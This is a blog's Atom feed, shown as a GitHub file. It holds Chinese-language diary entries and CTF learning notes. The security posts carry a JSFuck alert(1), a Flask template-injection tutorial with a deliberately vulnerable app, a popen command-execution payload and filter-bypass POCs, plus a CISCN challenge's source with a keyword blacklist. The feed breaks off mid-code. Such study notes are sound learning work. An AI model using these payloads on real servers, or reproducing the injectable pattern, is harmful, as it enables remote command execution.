-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathatom.xml
More file actions
495 lines (236 loc) · 122 KB
/
atom.xml
File metadata and controls
495 lines (236 loc) · 122 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>fogpost`s little blog</title>
<link href="https://fogpost.top/atom.xml" rel="self"/>
<link href="https://fogpost.top/"/>
<updated>2026-01-06T12:54:22.146Z</updated>
<id>https://fogpost.top/</id>
<author>
<name>fogpost</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>diary</title>
<link href="https://fogpost.top/2026/01/05/diary-2026-1-4/"/>
<id>https://fogpost.top/2026/01/05/diary-2026-1-4/</id>
<published>2026-01-04T16:00:00.000Z</published>
<updated>2026-01-06T12:54:22.146Z</updated>
<content type="html"><![CDATA[<h1 id="2026-1-4-13-04-05"><a href="#2026-1-4-13-04-05" class="headerlink" title="2026_1_4 13:04:05"></a>2026_1_4 13:04:05</h1><ul><li><p>今天分享一个网站<br><a href="https://idcflare.com/">idcflare</a><br><img src="https://gitee.com/fogpost/photo/raw/master/202601041333515.png" srcset="/img/loading.gif" lazyload alt="图片介绍"><br>一个挺好的资源分享网站,目标是回到最开始的互联网净土,我受够-csdn了。</p></li><li><p>今天继续c coding,大概完成一个篇章十个题吧,<br>下午去检查眼睛和买新鞋子了。眼睛结果出来了,结膜炎,敷点药和早点休息,不能再熬夜了,每天要多休息才行</p></li><li><p>继续读书分享win32api,基本只读完了序言,了解了以下基本的学习路线,打算这个月先吧这本书读完,这两天又发现了许多资料,其实自己完全不用去找新的在自己的学习网站中把老的先学完好一点</p></li><li><p>感觉还是得字数多一点,要反复修改以下自己的文章,每一篇的字数感觉至少要到400-500的样子才好</p></li></ul><h1 id="2026-1-5-19-48-56"><a href="#2026-1-5-19-48-56" class="headerlink" title="2026_1_5 19:48:56"></a>2026_1_5 19:48:56</h1><ul><li><p>想想凑字数的话还是先把这篇写长一点后面有想法了再分开来,之后还要好好的把之前的文章整理以下,许多废文和不完整的可以整理,多用用草稿,今天下午才开始吧代码写起来,现在还困困的,每天写不了多少,今天6个题都不知道写不写的完,书还没开始看</p></li><li><p>切实感受到在学校里面还是好学一点,在家里面下午来个人就吵得要死,根本干不了事情,本来想睡觉得搞得现在还昏昏得打算小睡一下再开始写代码</p></li><li><p>又想到一个点可以把自己得代码贴上来,前提是有点意思得才行,不然还是有点水了,对了昨天晚上还在想自己得视频计划呢,打算每周六周日得时候发一篇文章才行,15~20min得视频5000字得稿子就行,还得抽时间写稿子,好多事情,今天早上还没干什么。</p></li><li><p>信息流这件事还忘记说了,我要在搞毕设还有那个网络设计我都忘记了。之后给网站还要加上外部连接以及RSS效果,之前没加是忘记了还是怎么,对了,之后想用Django吧网站重构一下,可能得几个月后了,总之先这样</p></li></ul><h1 id="2026-1-6-20-53-34"><a href="#2026-1-6-20-53-34" class="headerlink" title="2026_1_6 20:53:34"></a>2026_1_6 20:53:34</h1><ul><li>刚刚看了以下obstain的全自动化本地网络自动上传确实好,还有本博客的update也有点问题,预计未来几天不会更新会专注与更新相关的内容,期待下周与各位的见面</li></ul>]]></content>
<summary type="html"><h1 id="2026-1-4-13-04-05"><a href="#2026-1-4-13-04-05" class="headerlink" title="2026_1_4 13:04:05"></a>2026_1_4 13:04:05</h1><ul>
<li><p>今</summary>
<category term="diary" scheme="https://fogpost.top/tags/diary/"/>
</entry>
<entry>
<title>新的开始</title>
<link href="https://fogpost.top/2025/12/25/%E6%96%B0%E7%9A%84%E5%BC%80%E5%A7%8B/"/>
<id>https://fogpost.top/2025/12/25/%E6%96%B0%E7%9A%84%E5%BC%80%E5%A7%8B/</id>
<published>2025-12-25T07:49:59.000Z</published>
<updated>2025-12-25T08:01:58.022Z</updated>
<content type="html"><![CDATA[<h2 id="过去的总结"><a href="#过去的总结" class="headerlink" title="过去的总结"></a>过去的总结</h2><p>目前也算是把考研结束了接下来还有许多事情要看先定个基调,blog还是要转换到这个hexo上面来才行,之前Notion上面虽然好用但感觉还是有部分不足,果然还是原生本位的好用,用马哲的话来讲就是否定之否定了。</p><h2 id="之后的目标"><a href="#之后的目标" class="headerlink" title="之后的目标"></a>之后的目标</h2><p>从轻重缓急来设定几个目标把</p><h3 id="急迫"><a href="#急迫" class="headerlink" title="急迫"></a>急迫</h3><ol><li>眼前1月15日的c语言程序设计</li><li>还有一个毕设</li></ol><h3 id="中等"><a href="#中等" class="headerlink" title="中等"></a>中等</h3><ol><li>看完c++反汇编与逆向分析这本书</li><li>多逆逆自己写的c</li><li>pwpw和wewe</li></ol><h3 id="较弱"><a href="#较弱" class="headerlink" title="较弱"></a>较弱</h3><ol><li>玩完witch3</li></ol><h3 id="额外目标"><a href="#额外目标" class="headerlink" title="额外目标"></a>额外目标</h3><ol><li>打算利用django去把自己的blog重构一个</li><li>打算写一个ctf聚合网站</li></ol><h3 id="变成习惯"><a href="#变成习惯" class="headerlink" title="变成习惯"></a>变成习惯</h3><ul><li>学习英语</li></ul><p>就这样吧,之后陆续更新把notion和这几个月来的东西传到网站上。</p>]]></content>
<summary type="html"><h2 id="过去的总结"><a href="#过去的总结" class="headerlink" title="过去的总结"></a>过去的总结</h2><p>目前也算是把考研结束了接下来还有许多事情要看先定个基调,blog还是要转换到这个hexo上面来才行,之前Notion</summary>
<category term="diary" scheme="https://fogpost.top/tags/diary/"/>
</entry>
<entry>
<title>2025</title>
<link href="https://fogpost.top/2025/02/24/2025/"/>
<id>https://fogpost.top/2025/02/24/2025/</id>
<published>2025-02-24T09:09:48.000Z</published>
<updated>2025-02-24T09:30:54.309Z</updated>
<content type="html"><![CDATA[<p>一晃眼就已经是2025年了,去年的烦恼还没有散去,今年的烦恼就已经找上门来了,这一篇算是鼓励也算是警醒吧,说是有多忙,其实倒也没多少事,完成以下几件事是目前的需要</p><ul><li><p>完成程序设计课程</p></li><li><p>继续学习web的相关知识为之后的hvv做好准备</p></li><li><p>准备好考研的相关事宜<br>这个学期没有什么课程,技术方向的事情便可以有时间提升,剩下的想到再补吧<br>ps: 锻炼也要跟上,老是想玩游戏,总是忍不住去玩而不是精进自己也算是要完成的事吧</p></li><li><p>个人能力<br><img src="https://gitee.com/fogpost/photo/raw/master/202502241730506.png" srcset="/img/loading.gif" lazyload></p></li></ul>]]></content>
<summary type="html"><p>一晃眼就已经是2025年了,去年的烦恼还没有散去,今年的烦恼就已经找上门来了,这一篇算是鼓励也算是警醒吧,说是有多忙,其实倒也没多少事,完成以下几件事是目前的需要</p>
<ul>
<li><p>完成程序设计课程</p>
</li>
<li><p>继续学习web的相关知识为</summary>
</entry>
<entry>
<title>web的js小知识</title>
<link href="https://fogpost.top/2025/01/11/web%E7%9A%84js%E5%B0%8F%E7%9F%A5%E8%AF%86/"/>
<id>https://fogpost.top/2025/01/11/web%E7%9A%84js%E5%B0%8F%E7%9F%A5%E8%AF%86/</id>
<published>2025-01-11T02:51:32.000Z</published>
<updated>2025-01-11T02:53:45.102Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>javacript教程,在许多网页小游戏中,就用到了js,类似的还有js<br>JavaScript 是 web 开发人员必须学习的 3 门语言中的一门:<br> HTML 定义了网页的内容<br> CSS 描述了网页的布局<br> JavaScript 控制了网页的行为</p><h2 id="JSFUCK"><a href="#JSFUCK" class="headerlink" title="JSFUCK"></a>JSFUCK</h2><figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scheme">[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]][([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+([][[]]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+([][[]]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]((<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]])()<br></code></pre></td></tr></table></figure><p>这一段是alert(1),再开发者工具的console(控制台)中运行即可。</p>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>javacript教程,在许多网页小游戏中,就用到了js,类似的还有js<br>JavaScript 是 web 开发人员必须学习的 3 门</summary>
<category term="WEB" scheme="https://fogpost.top/categories/WEB/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>flask模板注入</title>
<link href="https://fogpost.top/2025/01/10/flask%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/"/>
<id>https://fogpost.top/2025/01/10/flask%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/</id>
<published>2025-01-10T06:50:20.000Z</published>
<updated>2025-01-11T02:47:58.558Z</updated>
<content type="html"><![CDATA[<h1 id="flask模板注入"><a href="#flask模板注入" class="headerlink" title="flask模板注入"></a>flask模板注入</h1><p>作为 Web 中的难点还是有必要涉猎一番<br>参考文章: <a href="https://xz.aliyun.com/t/3679?time__1311=n4+xnii=oGqmqDK0QDODlx6e0=bG=KtezkWGb84D">flask之ssti模版注入从零到入门</a></p><h2 id="模板代码"><a href="#模板代码" class="headerlink" title="模板代码"></a>模板代码</h2><p>代码基于 Python,使用 Flask 框架,模板使用 Jinja2,需要额外下载 Flask 和 Jinja2,用 PyCharm 可能会简单一点。<br>解释:<code>index</code> 是没有漏洞点的,漏洞点在 <code>test</code> 中。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> render_template<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> request<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> render_template_string<br><br>app = Flask(__name__)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">'/'</span></span>)</span><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">'/index'</span></span>) </span><span class="hljs-comment"># 我们访问 / 或 /index 都会跳转</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br> <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">"index.html"</span>, title=<span class="hljs-string">'Home'</span>, user=request.args.get(<span class="hljs-string">"key"</span>))<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">'/test'</span>, methods=[<span class="hljs-string">'GET'</span>, <span class="hljs-string">'POST'</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">test</span>():<br> template = <span class="hljs-string">'''</span><br><span class="hljs-string"> <div class="center-content error"></span><br><span class="hljs-string"> <h1>Oops! That page doesn't exist.</h1></span><br><span class="hljs-string"> <h3>%s</h3></span><br><span class="hljs-string"> </div> </span><br><span class="hljs-string"> '''</span> % request.url<br><br> <span class="hljs-keyword">return</span> render_template_string(template)<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:<br> app.debug = <span class="hljs-literal">True</span><br> app.run()<br></code></pre></td></tr></table></figure><h3 id="示例-index-html"><a href="#示例-index-html" class="headerlink" title="示例 index.html"></a>示例 <code>index.html</code></h3><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag"><<span class="hljs-name">html</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">head</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">title</span>></span>{{ title }} - 小猪佩奇<span class="hljs-tag"></<span class="hljs-name">title</span>></span><br> <span class="hljs-tag"></<span class="hljs-name">head</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">body</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">h1</span>></span>Hello, {{ user.name }}!<span class="hljs-tag"></<span class="hljs-name">h1</span>></span><br> <span class="hljs-tag"></<span class="hljs-name">body</span>></span><br><span class="hljs-tag"></<span class="hljs-name">html</span>></span><br></code></pre></td></tr></table></figure><h3 id="SSTI-利用示例"><a href="#SSTI-利用示例" class="headerlink" title="SSTI 利用示例"></a>SSTI 利用示例</h3><p>利用 Python 的类继承,我们可以反向调用其他的函数。<br>一般是 <code><class 'os._wrap_close'></code>,每个版本不同,Python 3.8 中为 <code>133</code>。</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">http://127.0.0.1:5000/test?key={{"".__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('dir').read()}}<br></code></pre></td></tr></table></figure><p><img src="https://gitee.com/fogpost/photo/raw/master/202501101750658.png" srcset="/img/loading.gif" lazyload></p><h2 id="CTF-中的一些绕过-Tips"><a href="#CTF-中的一些绕过-Tips" class="headerlink" title="CTF 中的一些绕过 Tips"></a>CTF 中的一些绕过 Tips</h2><ol><li><p><strong>过滤 <code>[]</code> 等括号</strong><br>使用 <code>getitem</code> 绕过。例如原 POC:<code>{{"".class.bases[0]}}</code><br>绕过后:<code>{{"".class.bases.getitem(0)}}</code></p></li><li><p><strong>过滤 <code>subclasses</code>,拼凑法</strong><br>原 POC:<code>{{"".class.bases[0].subclasses()}}</code><br>绕过后:<code>{{"".class.bases[0]['subcla' + 'sses']}}</code></p></li><li><p><strong>过滤 <code>class</code></strong><br>使用 <code>session</code> 绕过:<br>POC:<code>{{session['cla' + 'ss'].bases[0].bases[0].bases[0].bases[0].subclasses()[133]}}</code></p><p>多个 <code>bases[0]</code> 是因为一直在向上找 <code>object</code> 类。使用 <code>mro</code> 更方便: </p><ul><li><code>{{session['__cla' + 'ss__'].__mro__[12]}}</code><br>或 </li><li><code>{{request['__cl' + 'ass__'].__mro__[12]}}</code></li></ul></li></ol><!-- 4. **`timeit` 姿势** --><p>示例:<a href="https://www.secpulse.com/archives/65568.html">2017 SWPU-CTF 的一道沙盒 Python 题</a></p><h2 id="一张图总结一下-SSTI-的一些模板渲染引擎及利用"><a href="#一张图总结一下-SSTI-的一些模板渲染引擎及利用" class="headerlink" title="一张图总结一下 SSTI 的一些模板渲染引擎及利用"></a>一张图总结一下 SSTI 的一些模板渲染引擎及利用</h2><p><img src="https://gitee.com/fogpost/photo/raw/master/202501101756362.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<summary type="html"><h1 id="flask模板注入"><a href="#flask模板注入" class="headerlink" title="flask模板注入"></a>flask模板注入</h1><p>作为 Web 中的难点还是有必要涉猎一番<br>参考文章: <a href="htt</summary>
<category term="WEB" scheme="https://fogpost.top/categories/WEB/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>ciscnwp复现</title>
<link href="https://fogpost.top/2025/01/10/ciscnwp%E5%A4%8D%E7%8E%B0/"/>
<id>https://fogpost.top/2025/01/10/ciscnwp%E5%A4%8D%E7%8E%B0/</id>
<published>2025-01-10T06:33:04.000Z</published>
<updated>2025-01-11T02:48:35.109Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>鼓起勇气面对ciscn,慢慢的对着wp复现,加油加油加油</p><h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="hello-web"><a href="#hello-web" class="headerlink" title="hello_web"></a>hello_web</h3><p>经典的ssrf,其实都完成得差不多了,在面对蚁剑的bypass时我们卡在了这里,于是没有打通,关于蚁剑的bypass,我额外写了一个bypass的文章,这里就不赘述了,同时本体还有双写绕过以及php特性的利用,[转化为_</p><h3 id="Safe-Proxy"><a href="#Safe-Proxy" class="headerlink" title="Safe_Proxy"></a>Safe_Proxy</h3><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, request,render_template_string<br><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> threading<br><span class="hljs-keyword">import</span> html<br><br>app = Flask(__name__)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">'/'</span>, methods=[<span class="hljs-string">"GET"</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">source</span>():<br> <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(__file__, <span class="hljs-string">'r'</span>, encoding=<span class="hljs-string">'utf-8'</span>) <span class="hljs-keyword">as</span> f:<br> <span class="hljs-keyword">return</span> <span class="hljs-string">'<pre>'</span>+html.escape(f.read())+<span class="hljs-string">'</pre>'</span><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">'/'</span>, methods=[<span class="hljs-string">"POST"</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">template</span>():<br> template_code = request.form.get(<span class="hljs-string">"code"</span>)<br> <span class="hljs-comment"># 安全过滤</span><br> blacklist = [<span class="hljs-string">'__'</span>, <span class="hljs-string">'import'</span>, <span class="hljs-string">'os'</span>, <span class="hljs-string">'sys'</span>, <span class="hljs-string">'eval'</span>, <span class="hljs-string">'subprocess'</span>, <span class="hljs-string">'popen'</span>, <span class="hljs-string">'system'</span>, <span class="hljs-string">'\r'</span>, <span class="hljs-string">'\n'</span>]<br> <span class="hljs-keyword">for</span> black <span class="hljs-keyword">in</span> blacklist:<br> <span class="hljs-keyword">if</span> black <span class="hljs-keyword">in</span> template_code:<br> <span class="hljs-keyword">return</span> <span class="hljs-string">"Forbidden content detected!"</span><br> result = render_template_string(template_code)<br> <span class="hljs-built_in">print</span>(result)<br> <span class="hljs-keyword">return</span> <span class="hljs-string">'ok'</span> <span class="hljs-keyword">if</span> result <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-literal">None</span> <span class="hljs-keyword">else</span> <span class="hljs-string">'error'</span><br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">HTTPProxyHandler</span>:<br> <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self, target_host, target_port</span>):<br> <span class="hljs-variable language_">self</span>.target_host = target_host<br> <span class="hljs-variable language_">self</span>.target_port = target_port<br><br> <span class="hljs-keyword">def</span> <span class="hljs-title function_">handle_request</span>(<span class="hljs-params">self, client_socket</span>):<br> <span class="hljs-keyword">try</span>:<br> request_data = <span class="hljs-string">b""</span><br> <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br> chunk = client_socket.recv(<span class="hljs-number">4096</span>)<br> request_data += chunk<br> <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(chunk) < <span class="hljs-number">4096</span>:<br> <span class="hljs-keyword">break</span><br><br> <span 